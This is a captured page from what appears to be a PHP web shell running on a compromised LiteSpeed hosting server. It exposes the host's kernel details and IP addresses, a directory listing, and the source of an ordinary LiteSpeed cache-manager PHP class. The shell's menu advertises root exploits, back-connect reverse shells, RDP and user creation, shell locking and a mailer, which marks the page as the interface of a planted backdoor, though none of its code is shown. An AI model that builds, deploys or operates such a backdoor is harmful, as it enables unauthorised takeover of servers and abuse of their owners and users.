Linux premium134.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.104 | : 216.73.217.117
Cant Read [ /etc/named.conf ]
?8.1.34
mfbsrygq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
add-ons /
webcachemgr /
src /
Panel /
[ HOME SHELL ]
Name
Size
Permission
Action
CPanel.php
26.45
KB
-rw-rw-r--
ControlPanel.php
33.79
KB
-rw-rw-r--
CustomPanelBase.php
1.09
KB
-rw-rw-r--
CustomPanelExample.php
5.24
KB
-rw-rw-r--
DirectAdmin.php
15.76
KB
-rw-rw-r--
PhpBinaryParts.php
1.42
KB
-rw-rw-r--
Plesk.php
13.01
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PhpBinaryParts.php
<?php /** ****************************************** * LiteSpeed Web Server Cache Manager * * @author Michael Alegre * @copyright 2026 LiteSpeed Technologies, Inc. * @since 1.17.10 * ******************************************* */ namespace Lsc\Wp\Panel; /** * Value object returned by ControlPanel::getPhpBinaryParts(). * * Separates the PHP binary path (one shell token, will be escapeshellarg'd * by the consumer) from the options string (shell-active, library-built). * * @since 1.17.10 */ class PhpBinaryParts { /** * @since 1.17.10 * @var string */ private $binPath; /** * @since 1.17.10 * @var string */ private $optionsString; /** * * @since 1.17.10 * * @param string $binPath Filesystem path to PHP executable. * @param string $optionsString PHP CLI flags as a shell-active string. * May be empty. */ public function __construct( $binPath, $optionsString = '' ) { $this->binPath = (string)$binPath; $this->optionsString = (string)$optionsString; } /** * * @since 1.17.10 * * @return string */ public function getBinPath() { return $this->binPath; } /** * * @since 1.17.10 * * @return string */ public function getOptionsString() { return $this->optionsString; } }
Close